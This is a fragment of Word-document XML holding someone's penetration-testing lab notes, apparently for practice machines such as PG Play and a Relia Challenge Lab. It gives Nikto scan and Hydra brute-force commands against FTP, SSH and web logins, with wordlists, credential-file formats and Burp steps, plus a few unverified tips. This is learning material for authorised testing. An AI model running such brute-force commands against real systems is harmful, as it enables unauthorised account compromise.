        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Test email sending with commands like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HELO</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom services:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Interact with any TCP-based protocol by typing raw commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001245">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use case: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's commonly used for testing, debugging, and manually interacting with network services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001246">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012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48">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wvdihaxkumwt" w:id="152"/>
      <w:bookmarkEnd w:id="152"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nikito</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001249">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nikito is really helpful for finding vulnerabilities within websites. And it's a really quick one line command so it doesn't hurt to try it. In the Sumo PG Play for example, it told us that it was vulnerable to ShellShock, which we probably wouldn't have been able to see ourselves.</w:t>
      </w:r>
    </w:p>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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nikto -h 192.168.195.87</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2641600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="85" name="image90.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image90.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35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2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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_el12rzc7gdhn" w:id="153"/>
      <w:bookmarkEnd w:id="153"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra</w:t>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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To make hydra bruteforce using username and password pairs, use the -u flag. I just saw this from a discord chat, I haven't looked into it but someone said it works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001253">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="643"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Don't think this works</w:t>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t xml:space="preserve">If you want it to go </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">line-by-line (first username and first pass, then second username and second pass and so on) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">instead of trying all combinations, then do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001256">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-C creds.txt</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1257">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then creds.txt should be in this format:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001258">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1096"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">michael:pass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001259">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1096"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john:1234</w:t>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t xml:space="preserve">RANDOM TIP: To get Hydra to base64 each item in a list, add a 64 after the USER and PASS variables. (^USER64^ and ^PASS64^)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000125D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="593"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can read more in-depth about this in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId358">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Billyboss</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>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highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to use a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username list</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then use the -L flag instead of -l flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001260">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1239"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-L users.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -P /usr/share/wordlists/rockyou.txt -e nsr ftp://192.168.236.157</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For passwords like for SSH, try this one first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001263">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="969"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/seclists/Passwords/500-worst-passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001264">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="969"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was used in the MedTech Challenge Lab since the rockyou.txt took too long</w:t>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t xml:space="preserve">The general format is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001267">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l &lt;&lt;username&gt;&gt; -P PASSFILE -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;service&gt;://&lt;IP&gt;</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One important flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000126E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId359">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Stapler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, the "reverse" login name as password ended up being the way into FTP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000126F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l michael  -P /usr/share/wordlists/rockyou.txt -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ftp://192.168.237.148</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001270">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e nsr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001271">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">additional checks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stands for "try empty password / username as password / reverse login."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001272">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The letters after it tell Hydra which extra guesses to include. Specifically:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001273">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → try null/empty password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001274">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → try login name as password (so: michael:michael)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001275">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ try reversed login name as password (so: michael:leahcim)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8clcoxkga83c" w:id="154"/>
      <w:bookmarkEnd w:id="154"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce Websites using Hydra</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an example I tested on</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .249 on Relia Challenge Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000127B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2324100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="173" name="image176.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image176.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId360"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2324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27C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First thing to do is intercept the request on burpsuite so that you know the parameters used to login, as well as any login failure hints in the Post Response (which we can see is "login_failed"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000127D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also look at the first line to make sure it's actually /cms/admin.php since sometimes the URL is different in the POST request than on firefox. In the case they are different, go with the one in POST request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000127E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we can try logging in randomly to see if there is a failure message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000127F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="863"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3164850" cy="2576513"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="82" name="image84.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image84.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
